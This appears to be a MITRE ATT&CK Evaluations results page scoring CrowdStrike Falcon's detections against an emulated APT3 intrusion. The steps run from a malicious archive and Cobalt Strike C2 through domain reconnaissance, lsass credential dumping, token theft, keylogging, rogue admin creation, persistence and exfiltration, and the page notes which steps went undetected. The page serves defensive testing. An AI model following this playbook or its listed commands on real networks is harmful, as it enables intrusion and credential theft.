Home  >  APT3  >  Results  >  CrowdStrike  >  All Results
Overwatch
Insight
Prevent
CrowdStrike
Falcon
Endpoint Protection Standard Bundle
Tags:    

CrowdStrike: All Results Tactic Page Information

The ATT&CK All Results page displays the procedures, tested techniques, and detection results for all steps in an evaluation. The Procedure column contains a description of how the technique in the corresponding technique column was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

MITRE does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation - these are not endorsed or validated by MITRE.

Vendor Configuration         JSON     Legend
Legend
Main Detection Categories: Detection Modifiers:

None

Telemetry

Indicator of Compromise

General Behavior

Specific Behavior

Enrichment

Tainted

Delayed

Configuration Change
Step
Procedures
Technique
Detection Type Detection Notes
1.A.1
Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
User Execution
(T1204)
Telemetry
Telemetry within the alert showed that Resume Viewer.exe executed, and would also be available in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1]
General Behavior
A General Behavior alert for Machine Learning showed that Resume Viewer.exe was executed and that it was detected as malicious. [1]
Previously executed batch file (pdfhelper.cmd) launched a DLL payload (update.dat) using Rundll32
Rundll32
(T1085)
Specific Behavior
A Specific Behavior alert was generated due to rundll32 launching a suspended process. The alert was mapped to the correct ATT&CK Technique (Rundll32) and Tactic (Defense Evasion). [1] [2]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating rundll32 executing update.dat was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2]
Telemetry
Telemetry within the OverWatch alert showed rundll32.exe executing, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Previously executed self-extracting archive (Resume Viewer.exe) launched an embedded batch file (pdfhelper.cmd)
Scripting
(T1064)
Telemetry
Telemetry showed pdfhelper.cmd being executed by cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating the execution of pdfhelper.cmd was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
1.B.1
Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
Registry Run Keys / Startup Folder
(T1060)
Telemetry
Telemetry showed Registry activity related to the Startup folder. Though no screenshot of the file write is available, this data maybe indicative of modifications to the folder. [1] [2]
1.C.1
Cobalt Strike: C2 channel established using port 53
Commonly Used Port
(T1043)
None
No detection capability demonstrated for this procedure, though DNS requests for freegoogleadsenseinfo.com (C2 domain) were observed (no detection showed port 53 specifically). [1] [2] [3] [4]
Cobalt Strike: C2 channel established using DNS traffic to freegoogleadsenseinfo.com
Standard Application Layer Protocol
(T1071)
Specific Behavior
A Specific Behavior alert was generated for abnormally large DNS requests for freegoogleadsenseinfo.com (C2 domain) being sent. The alert was mapped to a related ATT&CK Technique (Exfiltration Over Alternative Protocol) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior occurred because they observed suspected command and control or data exfiltration via DNS.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating the DNS traffic was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry within the OverWatch alert showed the DNS requests, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Cobalt Strike: C2 channel established using both NetBIOS and base64 encoding
Data Encoding
(T1132)
Telemetry (Tainted)
Telemetry showed the base64-encoded DNS requests for freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the parent Exfiltration alert. [1]
2.A.1
Cobalt Strike: 'ipconfig -all' via cmd
System Network Configuration Discovery
(T1016)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because ipconfig was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing ipconfig with command-line arguments. The process tree showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran ipconfig) were considered tainted and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
2.A.2
Cobalt Strike: 'arp -a' via cmd
System Network Configuration Discovery
(T1016)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because arp was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran arp) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
2.B.1
Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
System Owner/User Discovery
(T1033)
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran echo) were considered tainted. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because echo was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
2.C.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
2.C.2
Cobalt Strike: 'tasklist -v' via cmd
Process Discovery
(T1057)
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran tasklist) were considered tainted. [1] [2] [3] [4] [5]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because tasklist was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
2.D.1
Cobalt Strike: 'sc query' via cmd
System Service Discovery
(T1007)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because sc query was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing sc with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran sc) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
2.D.2
Cobalt Strike: 'net start' via cmd
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
2.E.1
Cobalt Strike: 'systeminfo' via cmd
System Information Discovery
(T1082)
Telemetry (Tainted)
Telemetry showed cmd.exe executing systeminfo. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran systeminfo) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because systeminfo was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating systeminfo execution was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
2.E.2
Cobalt Strike: 'net config workstation' via cmd
System Information Discovery
(T1082)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net config was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8]
2.F.1
Cobalt Strike: 'net localgroup administrators' via cmd
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating net localgroup execution was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
2.F.2
Cobalt Strike: 'net localgroup administrators -domain' via cmd
Permission Groups Discovery
(T1069)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
2.F.3
Cobalt Strike: 'net group "Domain Admins" -domain' via cmd
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The enrichment was tainted by a previous detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
2.G.1
Cobalt Strike: 'net user -domain' via cmd
Account Discovery
(T1087)
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net.exe) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
2.G.2
Cobalt Strike: 'net user george -domain' via cmd
Account Discovery
(T1087)
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
2.H.1
Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran reg) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because reg query was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
3.A.1
Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
Bypass User Account Control
(T1088)
Telemetry
Telemetry showed an integrity level change for user Debbie from 8192 (0x2000/Medium) to 12288 (0x3000/High), which is indicative of bypassing UAC. [1] [2] [3] [4]
Cobalt Strike: Built-in UAC bypass token duplication capability executed to modify current process token
Access Token Manipulation
(T1134)
None
No detection capability demonstrated for this procedure. [1]
3.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
3.C.1
Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
Process Injection
(T1055)
General Behavior (Delayed, Tainted)
OverWatch also generated a General Behavior alert identifying the injection as suspicious. The process tree view showed the alert as tainted by previous svchost.exe and powershell.exe detections.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5]
Specific Behavior (Tainted)
A Specific Behavior alert was generated showing that PowerShell created a thread into a remote process. The alert identified the correct ATT&CK Technique (Process Injection) and Tactic (Defense Evasion). The process tree view showed the alert as tainted by parent svchost.exe and powershell.exe detections. [1] [2] [3] [4] [5]
Telemetry
Telemetry associated with the alert would show thread creation in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5]
4.A.1
Cobalt Strike: 'net group "Domain Controllers" -domain' via cmd
Remote System Discovery
(T1018)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the enrichment showed net.exe executing with command-line arguments, and would be available in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert identifying cmd.exe executing net as suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
4.A.2
Cobalt Strike: 'net group "Domain Computers" -domain' via cmd
Remote System Discovery
(T1018)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the enrichment showed net.exe with command-line arguments, and would be available in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team identified net group as suspicious with a General Behavior alert.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
4.B.1
Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
System Network Configuration Discovery
(T1016)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because netsh was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry within the OverWatch alert showed netsh executing with command-line arguments, and would be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating the execution of netsh by cmd.exe was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
4.C.1
Cobalt Strike: 'netstat -ano' via cmd
System Network Connections Discovery
(T1049)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because netstat was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry within the OverWatch alert showed cmd.exe executing netstat with command-line arguments, and would be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating cmd.exe executing netstat with command-line arguments was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7]
5.A.1
Cobalt Strike: Built-in Mimikatz credential dump capability executed
Credential Dumping
(T1003)
Telemetry
Telemetry showing the lsass handle open and DLL loading would be available in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
General Behavior (Delayed, Tainted)
A General Behavior alert was generated by the OverWatch team indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a parent detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3]
Cobalt Strike: Credential dump capability involved process injection into lsass
Process Injection
(T1055)
Enrichment
The capability enriched several event types with descriptions, including for a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), as well as an lsass process accessed (ProcessHollowingDetected). [1] [2] [3] [4] [5]
5.A.2
Cobalt Strike: Built-in hash dump capability executed
Credential Dumping
(T1003)
Specific Behavior (Tainted)
A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
Telemetry
Telemetry for the lsass remote thread and DLL loading would be available in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3]
General Behavior (Delayed, Tainted)
OverWatch also generated a General Behavior alert indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a previous detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3]
Specific Behavior (Tainted)
A second Specific Behavior alert was generated for Credential Dumping, which indicated that "a remote thread in LSASS accessed credential registry keys." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
Cobalt Strike: Hash dump capability involved process injection into lsass.exe
Process Injection
(T1055)
Enrichment
The capability enriched several event types with descriptions, including for a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), malicious process hollowing (ProcessHollowingDetected), and a remote process injecting code into lsass (LsassInjectedCode). [1] [2] [3] [4] [5]
5.B.1
Cobalt Strike: Built-in token theft capability executed to change user context to George
Access Token Manipulation
(T1134)
Telemetry
Telemetry showed the compromised process (21898821890) running as Debbie, then children from this process spawning first as Debbie and later as George. This could indicate theft of George's token within the context of the process. [1]
6.A.1
Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
Query Registry
(T1012)
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the reg query command was suspicious. The alert was tainted by the parent cmd.exe process.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by the parent cmd.exe process. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
6.B.1
Cobalt Strike: C2 channel modified to use port 80
Commonly Used Port
(T1043)
Telemetry
Telemetry showed a connection over TCP port 80 to 192.168.0.4 (C2 server). [1] [2] [3] [4]
Cobalt Strike: C2 channel modified to use HTTP traffic to freegoogleadsenseinfo.com
Standard Application Layer Protocol
(T1071)
None
No detection capability demonstrated for this procedure, though telemetry showed a connection to 192.168.0.4 (C2 server) on port 80 (no detection showed HTTP specifically). [1] [2] [3] [4] [5] [6]
Cobalt Strike: C2 channel modified to split communications between both HTTP and DNS
Multiband Communication
(T1026)
Telemetry (Tainted)
Telemetry showed connections over both DNS and TCP port 80, which could indicate multiband communication. The DNS connections were tainted by a parent Exfiltration alert. [1] [2]
6.C.1
Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
Remote Desktop Protocol
(T1076)
Telemetry
Telemetry showed a connection for logon type 10 (interactive logon) and a connection to 10.0.0.5 (Conficker) over TCP port 3389. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because they identified suspicious communications over port 3389 (RDP) to other hosts.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
7.A.1
Added user Jesse to Conficker (10.0.0.5) through RDP connection
Create Account
(T1136)
Telemetry
Telemetry showed the creation of the user Jesse and the user being added to the domain admin group. [1] [2] [3]
Microsoft Management Console (Local Users and Groups snap-in) GUI utility used to add new user through RDP connection
Graphical User Interface
(T1061)
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
Microsoft Management Console (Local Users and Groups snap-in) GUI utility displayed user account information
Account Discovery
(T1087)
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Telemetry (Tainted)
Telemetry showed the file write for updater.dll into the system32 folder by user George. The telemetry was tainted by the parent "unexpected process" alert. [1] [2] [3] [4] [5] [6] [7] [8]
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Telemetry
Telemetry showed the creation of the scheduled task. [1] [2] [3] [4]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a scheduled task was created for persistence.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the creation of the scheduled task was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4]
8.A.1
Cobalt Strike: 'dir -s -b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
Telemetry showed cmd.exe running dir. The process tree view showed the cmd.exe process that ran dir as tainted by a prior detection. [1] [2] [3] [4] [5] [6]
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
Telemetry showed cmd.exe running tree with command-line arguments. The process tree view also showed the cmd.exe that was the parent for tree.com as tainted by a prior detection. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating tree.com was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was identified because tree was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
None
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect input capture specifically). [1] [2] [3] [4]
Cobalt Strike: Keylogging capability included residual enumeration of application windows
Application Window Discovery
(T1010)
None
No detection capability demonstrated for this procedure. [1]
8.D.1
Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
None
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect screen capture specifically). [1]
Cobalt Strike: Screen capture capability involved process injection into explorer.exe
Process Injection
(T1055)
Telemetry
Telemetry showed InjectedThread events for explorer.exe (pid=21776848613) injecting from cmd.exe (pid=21898821890), which is a known beacon. [1] [2] [3] [4] [5]
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
9.B.1
Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
No detection capability demonstrated for this procedure.
Cobalt Strike: Download capability exfiltrated data through existing C2 channel
Exfiltration Over Command and Control Channel
(T1041)
None
No detection capability demonstrated for this procedure.
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Telemetry
Telemetry showed cmd.exe running autoupdate.bat from the Startup folder. [1] [2]
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry (Tainted)
Telemetry showed rundll32.exe starting updater.dll. The telemetry was tainted by the parent OverWatch alert. [1] [2] [3] [4]
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Valid Accounts
(T1078)
Telemetry
Telemetry showed a type 10 (interactive) UserLogon event for Jesse. [1] [2] [3] [4]
RDP connection made to Conficker (10.0.0.5) as part of execution of persistence mechanism
Remote Desktop Protocol
(T1076)
Telemetry
Telemetry showed the remote connection to Conficker for a user logon by Jesse with type 10 (interactive) as well as the use of rdpclip.exe by the logged-on user. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior occurred because they observed suspicious communications over 3389 (RDP) to other hosts.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Telemetry
Telemetry within the OverWatch alert showed wscript.exe executing launcher.vbs, and would be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
A General Behavior alert was generated from OverWatch indicating wscript.exe executing launcher.vbs was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a malicious script invoked by wscript was run by Bob on CodeRed and launched PowerShell.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior
A Specific Behavior alert was generated indicating "A PowerShell script launched that shares characteristics with known PowerShell exploit kits." [1] [2] [3] [4] [5] [6] [7] [8]
11.B.1
Empire: C2 channel established using port 443
Commonly Used Port
(T1043)
Telemetry (Tainted)
Telemetry showed powershell.exe making connection to 192.168.0.5 (C2 server) over port 443. The telemetry was tainted by an alert on its parent powershell.exe process. [1] [2] [3] [4]
